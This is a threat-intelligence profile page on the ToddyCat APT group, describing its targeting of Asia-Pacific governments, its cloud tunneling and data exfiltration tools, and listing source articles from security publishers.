Toddycat

Threat Actor updated 5 days ago (2024-09-03T11:18:03.684Z)

Download STIX

Preview STIX

ToddyCat is a notable threat actor in the cybersecurity industry, primarily targeting government organizations in the Asia-Pacific region. The group uses various methods to infiltrate systems and collect sensitive data. Notably, ToddyCat has been linked to the Advanced Persistent Threat (APT) group known as ToddyCat APT, which has been reported to use sophisticated techniques such as tunneling to legitimate cloud providers to access remote infrastructure. These actions typically involve an application running on the user's host with access to the local infrastructure connecting to the cloud through a legitimate agent, redirecting traffic or executing specific commands. The infiltration process of ToddyCat involves deploying a malware known as ToddyCat Ninja approximately 10 minutes after system infection. This malware, along with other tools, is used to collect and exfiltrate files of interest to this APT threat actor. In previous reports, ToddyCat was found to exploit vulnerabilities in infrastructures, creating a significant threat to the security of targeted organizations. Additionally, ToddyCat has been associated with other threat groups including the China-linked Evasive Panda group, which has targeted Tibetan nationals in India and the United States. ToddyCat itself has been reported to target groups in Vietnam and Taiwan, stealing data on an industrial scale. Continuous reporting and monitoring of ToddyCat's activities are crucial in understanding their strategies and mitigating their threats.

Description last updated: 2024-09-03T11:17:07.201Z

What's your take? (Question 1 of 3)

Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.

Aliases We are not currently tracking any aliases

Miscellaneous Associations

Other elements of context that could aid in the identification of relevance

Apt

Malware

Espionage

Exploit

Analyst Notes & Discussion

Be the first to leave your mark here! Log in to share your views and vote.

Source Document References

Information about the Toddycat Threat Actor was read from the documents corpus below. This display is limited to 20 results, create a free account to see more

Source Link	CreatedAt	Title
Securelist	4 days ago	Most interesting IR cases in 2023: insider threats and more
Securelist	5 days ago	Malware report for Q2 2024 — a quarterly review
Securelist	25 days ago	Kaspersky report on APT trends in Q2 2024
Securelist	a month ago	LianSpy: Android spyware leveraging Yandex Disk as C2
DARKReading	3 months ago	Pakistani 'Transparent Tribe' APT Aims for Cross-Platform Impact
Securelist	4 months ago	QakBot attacks with Windows zero-day (CVE-2024-30051)
Securelist	4 months ago	2023 Kaspersky Incident Response report
DARKReading	5 months ago	ToddyCat APT Is Stealing Data on 'Industrial Scale'
Securelist	5 months ago	ToddyCat’s traffic tunneling and data extraction tools
CERT-EU	a year ago	‘Stayin’ Alive’ cyber espionage campaign targets telecoms, governments in Asia
CERT-EU	a year ago	APT trends report Q2 2023 – GIXtools
CERT-EU	a year ago	Cyber Security Week in Review: October 13, 2023
Securelist	a year ago	ToddyCat: Keep calm and check logs
CERT-EU	a year ago	Researchers Uncover Ongoing Attacks Targeting Asian Governments and Telecom Giants
CERT-EU	a year ago	Water cybersecurity regulations withdrawn
CERT-EU	a year ago	Chinese ‘Stayin’ Alive’ Attacks Dance Onto Targets With Dumb Malware
InfoSecurity-magazine	10 months ago	Signature Techniques of Asian APT Groups Revealed
CERT-EU	10 months ago	Les dernières cyberattaques (24 octobre 2023)
InfoSecurity-magazine	10 months ago	QuasarRAT Deploys Advanced DLL Side-Loading Technique
Securityaffairs	a year ago	Security Affairs newsletter Round 442 by Pierluigi Paganini